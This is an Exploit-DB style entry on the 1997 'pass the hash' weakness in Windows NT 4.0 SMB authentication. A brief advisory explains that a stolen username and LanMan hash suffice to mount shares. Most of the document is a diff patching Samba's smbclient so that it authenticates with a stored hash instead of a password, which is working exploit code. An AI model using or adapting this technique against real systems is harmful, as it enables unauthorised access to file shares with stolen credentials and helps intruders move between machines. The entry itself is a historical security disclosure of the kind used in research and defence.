Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client

EDB-ID:

19197

CVE:





Platform:

Windows

Date:

1997-04-08


source: https://www.securityfocus.com/bid/233/info

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

Paul Ashton <paul@EIGEN.CO.UK> posted the theory and corresponding exploit code to NTBugtraq. In order for his code to work, you must "exist both in /etc/passwd and /usr/local/samba/private/smbpasswd as the same username and same uid as your rid in NT, and smbclient can read it".

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host. 


*** orig_client.c Tue Apr 8 17:27:29 1997
--- client.c Tue Apr 8 20:57:43 1997
***************
*** 3020,3026 ****
{-1,NULL}
};

-
/****************************************************************************
send a login command
****************************************************************************/
--- 3020,3025 ----
***************
*** 3039,3044 ****
--- 3038,3061 ----
int numprots;
int tries=0;

+ #ifdef USESMBPASSWDFILE
+ /*TODO check for valid password and uid = getuid */
+ BOOL got_encpass;
+ struct passwd *pwd;
+ struct smb_passwd *smb_pass;
+ unsigned char p21[21];
+
+ memset(p21, 0, sizeof p21);
+ pwd = getpwuid(getuid());
+ if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name)))
+ {
+ strcpy(password, "not empty");
+ got_pass = got_encpass = True;
+ memcpy(p21, smb_pass->smb_passwd, 16);
+ }
+ setuid(getuid());
+ #endif
+
if (was_null)
{
inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN);
***************
*** 3189,3194 ****
--- 3205,3215 ----
if (doencrypt && *pass) {
DEBUG(3,("Using encrypted passwords\n"));
passlen = 24;
+
+ #ifdef USESMBPASSWDFILE
+ if (got_encpass) E_P24(p21,cryptkey,pword);
+ else
+ #endif
SMBencrypt(pass,cryptkey,pword);
}
#else
***************
*** 3252,3257 ****
--- 3273,3281 ----
(CVAL(inbuf,smb_rcls) == ERRSRV &&
SVAL(inbuf,smb_err) == ERRbadpw)))
{
+ #ifdef USESMBPASSWDFILE
+ got_encpass =
+ #endif
got_pass = False;
DEBUG(3,("resending login\n"));
goto get_pass;